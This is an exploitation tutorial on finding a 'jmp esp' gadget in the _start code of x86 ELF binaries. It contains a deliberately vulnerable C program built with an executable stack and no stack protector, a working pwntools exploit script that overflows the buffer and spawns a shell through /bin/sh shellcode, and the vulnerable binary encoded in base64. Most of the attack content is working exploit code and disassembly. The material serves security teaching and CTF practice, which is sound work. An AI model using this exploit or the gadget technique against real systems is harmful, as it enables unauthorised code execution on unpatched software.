x86 ELF Stack Overflow Jmp Esp (Rsp) Trick

In short: You can find jmp esp (jmp rsp) gadget in almost every dynamic linked ELF binary.

Here's a common _start from a x86 ELF binary:

080488d3 <_start>:
 80488d3:    31 ed          xor  ebp,ebp
 80488d5:    5e           pop  esi
 80488d6:    89 e1          mov  ecx,esp
 80488d8:    83 e4 f0        and  esp,0xfffffff0
 80488db:    50           push  eax
 80488dc:    54           push  esp
 80488dd:    52           push  edx
 80488de:    68 80 8f 04 08     push  0x8048f80
 80488e3:    68 10 8f 04 08     push  0x8048f10
 80488e8:    51           push  ecx
 80488e9:    56           push  esi
 80488ea:    68 b0 88 04 08     push  0x80488b0
 80488ef:    e8 cc fe ff ff     call  80487c0 <__libc_start_main@plt>
 80488f4:    f4           hlt
 80488f5:    66 90          xchg  ax,ax
 80488f7:    66 90          xchg  ax,ax
 80488f9:    66 90          xchg  ax,ax
 80488fb:    66 90          xchg  ax,ax
 80488fd:    66 90          xchg  ax,ax
 80488ff:    90           nop

08048900 <__x86.get_pc_thunk.bx>:
 8048900:    8b 1c 24        mov  ebx,DWORD PTR [esp]
 8048903:    c3           ret

Use instruction truncation trick, diassembly at 0x080488f3:

 80488f3:    ff f4          push  esp
 80488f5:    66 90          xchg  ax,ax
 80488f7:    66 90          xchg  ax,ax
 80488f9:    66 90          xchg  ax,ax
 80488fb:    66 90          xchg  ax,ax
 80488fd:    66 90          xchg  ax,ax
 80488ff:    90           nop
 8048900:    8b 1c 24        mov  ebx,DWORD PTR [esp]
 8048903:    c3           ret

Which equals to:

 80488f3:    ff f4          push  esp
 8048900:    8b 1c 24        mov  ebx,DWORD PTR [esp]
 8048903:    c3           ret

We know that: jmp $ADDR equals to push $ADDR; ret.

So, once you got a binary without NX (DEP), this gadget would be super useful!

Sample

easybof.c:

// gcc-4.8 easybof.c -o easybof -m32 -zexecstack -fno-stack-protector -D_FORTIFY_SOURCE=0 -O3
#include <unistd.h>

int main()
{
  char buff[8];

  write(1, "Overflow me plz:", 16);
  read(0, buff, 128);
}

exploit.py:

#!/usr/bin/env python2
from pwn import * # pip2 install pwntools

ELF.find = lambda self, sig: next(elf.search(sig))

elf = ELF('easybof')

ret = elf.find('\xc3')
jmp_esp = elf.find('\xff\xff\xf4') + 1

print 'RET   gadget at 0x%.8x' % ret
print 'JMP_ESP gadget at 0x%.8x' % jmp_esp

context(arch='i386', os='linux')

io = process('./easybof')

shellcode = asm(shellcraft.sh())
payload = p32(ret) * 6 + p32(jmp_esp) + shellcode

io.recvuntil(':')
io.send(payload.ljust(128))
io.sendline('id')
print io.recvline()[:-1]

io.interactive()

easybof.elf (base64 encoded):

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
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABQhAQIMIQECAAAAAABAAAAAQAAAAwA
AADIggQIDQAAAOSEBAgZAAAACJ8ECBsAAAAEAAAAGgAAAAyfBAgcAAAABAAAAPX+/2+sgQQIBQAAACyCBAgGAAAAzIEECAoAAABQAAAACwAAABAAAAAVAAAA
AAAAAAMAAAAAoAQIAgAAABgAAAAUAAAAEQAAABcAAACwggQIEQAAAKiCBAgSAAAACAAAABMAAAAIAAAA/v//b4iCBAj///9vAQAAAPD//298ggQIAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABSfBAgAAAAAAAAAAAaDBAgWgwQIJoMECAAAAAAAAAAAR0NDOiAoVWJ1bnR1
IDQuOC41LTR1YnVudHUyKSA0LjguNQAALnNoc3RydGFiAC5pbnRlcnAALm5vdGUuQUJJLXRhZwAubm90ZS5nbnUuYnVpbGQtaWQALmdudS5oYXNoAC5keW5z
eW0ALmR5bnN0cgAuZ251LnZlcnNpb24ALmdudS52ZXJzaW9uX3IALnJlbC5keW4ALnJlbC5wbHQALmluaXQALnBsdC5nb3QALnRleHQALmZpbmkALnJvZGF0
YQAuZWhfZnJhbWVfaGRyAC5laF9mcmFtZQAuaW5pdF9hcnJheQAuZmluaV9hcnJheQAuamNyAC5keW5hbWljAC5nb3QucGx0AC5kYXRhAC5ic3MALmNvbW1l
bnQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAABAAAAAgAAAFSBBAhUAQAAEwAAAAAAAAAAAAAAAQAAAAAAAAATAAAA
BwAAAAIAAABogQQIaAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAIQAAAAcAAAACAAAAiIEECIgBAAAkAAAAAAAAAAAAAAAEAAAAAAAAADQAAAD2//9vAgAAAKyB
BAisAQAAIAAAAAUAAAAAAAAABAAAAAQAAAA+AAAACwAAAAIAAADMgQQIzAEAAGAAAAAGAAAAAQAAAAQAAAAQAAAARgAAAAMAAAACAAAALIIECCwCAABQAAAA
AAAAAAAAAAABAAAAAAAAAE4AAAD///9vAgAAAHyCBAh8AgAADAAAAAUAAAAAAAAAAgAAAAIAAABbAAAA/v//bwIAAACIggQIiAIAACAAAAAGAAAAAQAAAAQA
AAAAAAAAagAAAAkAAAACAAAAqIIECKgCAAAIAAAABQAAAAAAAAAEAAAACAAAAHMAAAAJAAAAQgAAALCCBAiwAgAAGAAAAAUAAAAYAAAABAAAAAgAAAB8AAAA
AQAAAAYAAADIggQIyAIAACMAAAAAAAAAAAAAAAQAAAAAAAAAdwAAAAEAAAAGAAAA8IIECPACAABAAAAAAAAAAAAAAAAQAAAABAAAAIIAAAABAAAABgAAADCD
BAgwAwAACAAAAAAAAAAAAAAACAAAAAAAAACLAAAAAQAAAAYAAABAgwQIQAMAAKIBAAAAAAAAAAAAABAAAAAAAAAAkQAAAAEAAAAGAAAA5IQECOQEAAAUAAAA
AAAAAAAAAAAEAAAAAAAAAJcAAAABAAAAAgAAAPiEBAj4BAAAGQAAAAAAAAAAAAAABAAAAAAAAACfAAAAAQAAAAIAAAAUhQQIFAUAACwAAAAAAAAAAAAAAAQA
AAAAAAAArQAAAAEAAAACAAAAQIUECEAFAADAAAAAAAAAAAAAAAAEAAAAAAAAALcAAAAOAAAAAwAAAAifBAgIDwAABAAAAAAAAAAAAAAABAAAAAAAAADDAAAA
DwAAAAMAAAAMnwQIDA8AAAQAAAAAAAAAAAAAAAQAAAAAAAAAzwAAAAEAAAADAAAAEJ8ECBAPAAAEAAAAAAAAAAAAAAAEAAAAAAAAANQAAAAGAAAAAwAAABSf
BAgUDwAA6AAAAAYAAAAAAAAABAAAAAgAAACGAAAAAQAAAAMAAAD8nwQI/A8AAAQAAAAAAAAAAAAAAAQAAAAEAAAA3QAAAAEAAAADAAAAAKAECAAQAAAYAAAA
AAAAAAAAAAAEAAAABAAAAOYAAAABAAAAAwAAABigBAgYEAAACAAAAAAAAAAAAAAABAAAAAAAAADsAAAACAAAAAMAAAAgoAQIIBAAAAQAAAAAAAAAAAAAAAEA
AAAAAAAA8QAAAAEAAAAwAAAAAAAAACAQAAAjAAAAAAAAAAAAAAABAAAAAQAAAAEAAAADAAAAAAAAAAAAAABDEAAA+gAAAAAAAAAAAAAAAQAAAAAAAAA=